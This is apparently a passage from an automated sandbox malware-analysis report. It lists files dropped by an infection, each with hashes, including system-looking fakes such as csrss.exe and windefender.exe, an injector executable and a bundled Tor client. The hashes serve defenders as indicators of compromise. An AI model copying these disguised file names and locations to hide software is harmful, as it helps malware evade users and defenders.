| SHA512 | 912a6aac98a5e83d9519b9bb40efebe843d5265768a702c5523161ba2edd422d7c7d743eaac8c5ddab6719f2500a9826979baab2ed22d0bd7d6be66f56d59923 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 81e219617f0f5835723d7920b8387504 |
| SHA1 | 790ca8b4b2c2412d569497270e2c5a7fc2196536 |
| SHA256 | a937f01ca7c5e481c72593fa847c302939665933173f53428ab43491c4f62a7d |
| SHA512 | 02b2ba7656d9ad5b2b850ba6fb04be2a10a10f5e275ab592514f185d084744c1b5597dbdf0c8745e0ffc3bbde5768c2ff3aa05417b2a7aecff9b7c0ed36bdb36 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Roaming\Tags\Settings.exe
| MD5 | 73ae6c3b85c619aa3fb06de545597251 |
| SHA1 | eb1aebe3b76ca3a2b5075880a307c7da2a7d4526 |
| SHA256 | 622b9f4f5d1eb80a8d6c0384d4c2cc62db85499005cbc5efb35e0fd343db7427 |
| SHA512 | 912a6aac98a5e83d9519b9bb40efebe843d5265768a702c5523161ba2edd422d7c7d743eaac8c5ddab6719f2500a9826979baab2ed22d0bd7d6be66f56d59923 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 62623d22bd9e037191765d5083ce16a3 |
| SHA1 | 4a07da6872672f715a4780513d95ed8ddeefd259 |
| SHA256 | 95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010 |
| SHA512 | 9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992 |
C:\Windows\rss\csrss.exe
| MD5 | 15ccfec965d35354a2142fac5324dcb3 |
| SHA1 | 4147dc51f89f068e1dd86746e00cb6e6f2a3fc4f |
| SHA256 | 4b275ec3c098c462846995c7281e90284059904e5494ce9b8cfd21571978198b |
| SHA512 | 3513db0d2f52873a5a23b29735e95e505ad0fea292771b5dc8df03dc100d1b5ecbb619842df7179b4c7452cb1cdd00691e23f9f8f98d436f587cd237d34f9500 |
C:\Windows\rss\csrss.exe
| MD5 | 5ede9444cd75f9459b2e9b342459f505 |
| SHA1 | ff1ba9423b3eb54a92acf4b70ec5e8d4f7d26627 |
| SHA256 | 339ab9ea5338eec72519fa58ec8bb6733d25eff99e496031e1b1ddef936384c2 |
| SHA512 | f28278aaf5f762dd276e52f8d20651a3298892a268cfbe5459828dfa2b37ec3762061475e36738d1646e35ed6570d596742a454f4cf0c46b9eaef280286f88f4 |
C:\Users\Admin\AppData\Local\Temp\29EA.exe
| MD5 | 5a45609af5960a9c4dbc014c4b5d244c |
| SHA1 | b7bf85e0744b6cadb9ab9455b30ea834f39faf7f |
| SHA256 | 203fc9ad7667f1dcff5617a0659a69ca00b50cee6e16d3d6d5b954d77da9f804 |
| SHA512 | 8096d82113efb5ca683c54581203c323af02748583e790310e63f702e9f0f2f20fbcc601d45201a4651432a644657998e7969ea4ceea618b6be6f1dfd52a74de |
C:\Users\Admin\AppData\Local\Temp\latestX.exe
| MD5 | 32a27baad5f258034ce06ac6af2f50d9 |
| SHA1 | f66f4139e0a93f52124d574c7b2ac4bdb86003c8 |
| SHA256 | 06b33d357ebfaa95a0bf8ceb20fedc532429e41890eb0f9aa7ff657f1d352eb2 |
| SHA512 | 25c75feae11baf22deb122469a72ce06ee08e38ee12325ff5021829092fad935694f9a6e3029ac4570b95440f9b967586d21630ec1e08736aa347eba0be5d334 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 7cb0337b756d69a7be3033dd6e382832 |
| SHA1 | baa60488b56bf731f0b819cb6ec776cc26af2369 |
| SHA256 | 19ded27b35a890678e81e21c70cc763137f03d4febca3292b68fc1f044b8750e |
| SHA512 | dc0876bba041e50161038b6de01fae930ebeef81807192a850113b5a2272a06cf9104214c27fbdd3028874e55a2c162b1da5018b80fb518944084d7763d78ce3 |
C:\Program Files\Google\Chrome\updater.exe
| MD5 | 95da659749eface0e13cfb3d0e14066a |
| SHA1 | bd603217113e715b5b2db6728ad7e82d2def6691 |
| SHA256 | 41918960565fee217f130bfe086619658754b4d891612287c0b855bd34cdb4c1 |
| SHA512 | 2b0e3f07b0c74775e9dd10b2f82dd22f7e6800f8c6d333b9551272a7858394c5c17ef0139b235f76bab75199ece2103e583ac9f63cc7bcf95188c3d69076228a |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 6bfa1a8bfcd8eb3af582a86a9ab3c742 |
| SHA1 | 398fcd6058976d0d2ce35837de57eaf41f8cd852 |
| SHA256 | 8487b79837e76c55c238e74aed5fa5149c1a968843909cc761c3065461b4ff0b |
| SHA512 | ce17087ffab56c3465e79d0625847accab9d4fda12a7ae3755c205f3e3aff4fe53a6625954dccb550d4b31bebfc47865d40a5b58269b7730d5b2839a6e9435c7 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | e05eafdd49496642c93745c94d61c128 |
| SHA1 | 7108db5d99ae116a283c7203ce3c55f3e222b620 |
| SHA256 | 53eb2bc0ed32d4184e202ae5602b31b2dfc3207bc0b2bee56f38bce02dbd8dc5 |
| SHA512 | b34f56b5a82e8dd6d08fdbad72ca8aee168a7d3a78ebba69f5446b8e58bf6407a29b44389d11ab6ab69a30259894a520f8db8f643220799ad18e4e4c3f3d4494 |
C:\Users\Admin\AppData\Local\Temp\6D0E.exe
| MD5 | 36dfcd31a45ce2c580f008b20e6cd2ad |
| SHA1 | a245d87d7ef799d9aded126e39d5372fb430139e |
| SHA256 | 3bcc0a133a93c3e05b01f496eb9c27b8c74104d5857dfb93aa8a08e6989520ac |
| SHA512 | 72971986db21b0023971361c825de2599c2ae4c5d8e837226a11f4363cdb9da671a5078c09dd72d62f4b8ecc1071051918b37d297a6d7a991f539d102236942d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7e00b0c35233794af15148d463815bec |
| SHA1 | d8cee4abcc48d649d103345e4526b3c6fdf03178 |
| SHA256 | 9e1c6d4262a26af1582583523b00e275b661df50a81f7ea967f7b60f4545d58c |
| SHA512 | 04d3b2578827b7cd15c491a71a7145e7bb54263c40de9b4703895e1dbe65ce756e067c1b756e9e05bc2a36ef68d1ba1205bf04e32b8ba7f2ccaa5b44faf85f69 |
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
C:\Users\Admin\AppData\Local\Temp\8DE5.exe
| MD5 | e519e00feb6e0534ba2154b9e865c184 |
| SHA1 | f4f4980c16a9aaa7c331811be95dd9900f5a09b9 |
| SHA256 | d694d11e2ced3fdd0ce34ab097ac2dc50db3e3ce026d65426a37b294ea4b90eb |
| SHA512 | a86d68795f0c774b2aef7ad4e4b90f21d67757255d171ff2bea753381aabd040f63048cda43ea852827c5b01da83ffa0b1236667b991d331710b9526106fd4ef |
C:\Windows\windefender.exe
| MD5 | 438fd3bcbc8794dcc50fb770b7bbc271 |
| SHA1 | f9242a03498fcd58766079919fc07c2d12aacef2 |
| SHA256 | c66c679eeedf575beeed45e9968c231c74eac6404ea945dff4abfa8852ec6841 |
| SHA512 | 5fd76745ecc510697a0405fbf79960b36042a88096f97d5fb6e99fe5abf168b3af073d9ba88273b0f4087bcc313aee625b93261d189ce72af21583bf2f08edd4 |
C:\Windows\windefender.exe
| MD5 | b5041f6d6e06f6ef2c9a57b7f71bd754 |
| SHA1 | ebd4fbce7add1fc506fe8acfd3a16754dadd067d |
| SHA256 | 1d0db51ce2bf3a8d6c51bc2a912e8085fb32f4b7776057243f9bc868a4d71199 |
| SHA512 | 2863415208e05e54459ef4711fa83f4c636384887ace921f0039ad5f4c9ab14488032c5c96070f906839c74ce148c78ed4a3a503821fd37d0aa84222c48a7c50 |
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libcrypto-1_1.dll
| MD5 | b7c32c8e7d21aa9b79470037227eba43 |
| SHA1 | 38d719b10ca035cee65162c1a44e2c62123d41b4 |
| SHA256 | 99b4042a858a9e437917c8256692e9ba161b87054ccf5e22538e86bb35c34f23 |
| SHA512 | d85345380b9605c8484e11873218aa4eaeea573ca51eedada6d0518695a2b184bb22faf7c5e3d88330935774ced17e9d80c577b06603aa1ca6dab748b0bd15a7 |
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libevent-2-1-7.dll
| MD5 | 736443b08b5a52b6958f001e8200be71 |
| SHA1 | e56ddc8476aef0d3482c99c5bfaf0f57458b2576 |
| SHA256 | da1f75b9ce5f47cb78a6930a50c08397ee4d9778302746340f4057fcd838dbf4 |
| SHA512 | 9dfcdb1186b089e7961767d427de986ad8e5f7715b7592984349d0b8e7f02198137c83e8c79a096a7475ad9f4695f52539fa08fa65912860ddf0a85515a7cda1 |
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libssp-0.dll
| MD5 | 7cdbaca31739500aefc06dd85a8558ff |
| SHA1 | adc36ec6a3cdc7e57a1b706c820e382627f6cb90 |
| SHA256 | 0a1dee5dd5234971f7526f3d5f8b7e2cfdcb536e18debd51c985010fb504fbdb |
| SHA512 | 6df8ac9054f27ebbef9642ce79ff7ba836411ea0ed0bd04b3cfe724a336a91f665c2cc0b7a4bfc99a80786d1a6d361b971a7dbb7a298b919a1baa812541841ba |
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libevent-2-1-7.dll
| MD5 | 736443b08b5a52b6958f001e8200be71 |
| SHA1 | e56ddc8476aef0d3482c99c5bfaf0f57458b2576 |
| SHA256 | da1f75b9ce5f47cb78a6930a50c08397ee4d9778302746340f4057fcd838dbf4 |
| SHA512 | 9dfcdb1186b089e7961767d427de986ad8e5f7715b7592984349d0b8e7f02198137c83e8c79a096a7475ad9f4695f52539fa08fa65912860ddf0a85515a7cda1 |
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
| MD5 | 16f6d83195f39bda25fef182fd1ac5c4 |
| SHA1 | cb8d57181bf338c1e36f8baba92d7453569f58b1 |
| SHA256 | e35a3356b6c1565c842ceb03a311da29740a036894c42bee0d23efd5563a9cb5 |
| SHA512 | fd04fa2f660601a70555719feb8598c33bce0c882957079f4723908c6ce90613b4b6ce9e38ba0565e6c2479acfce4bef91a587a2fc632f2e84b65587abe2fa3a |
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
| MD5 | 58edee3c1e45c722f305f465e4d2d257 |
| SHA1 | fb299dcd6d7da4383b5cad4f232f9b27695c6299 |
| SHA256 | 4f750d3088bbccb4822a84384092d85d605c8b3adc09b5f6245f4485a9ebf786 |
| SHA512 | 22a0ebaf2bbc9099cdc8305642106785663b7c9ed7867dca171536f6ac92ebee90c4bcf01ebe9c59b493bdbe9d2bb324f9ccb22c343729ed55ad8fedd8ccc91d |
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\cached-microdesc-consensus.tmp
| MD5 | fd6962e009deecea212d5b1fc87f0b05 |
| SHA1 | 4e81c663018c08624c1f8db07fe115b19d1323ce |
| SHA256 | 40f2a6e756e24334222220a2b38cf7124a97d8af031bf5232fe8f5e4322d2220 |
| SHA512 | c72533565dece8cd70a88ca1d0460fd1ccebb7c4ebd75a0e1b57bc9f601926aac3330eb076bd319b052eede641a37b46db3e8d39d0e2d51488b23f37bf5aa88b |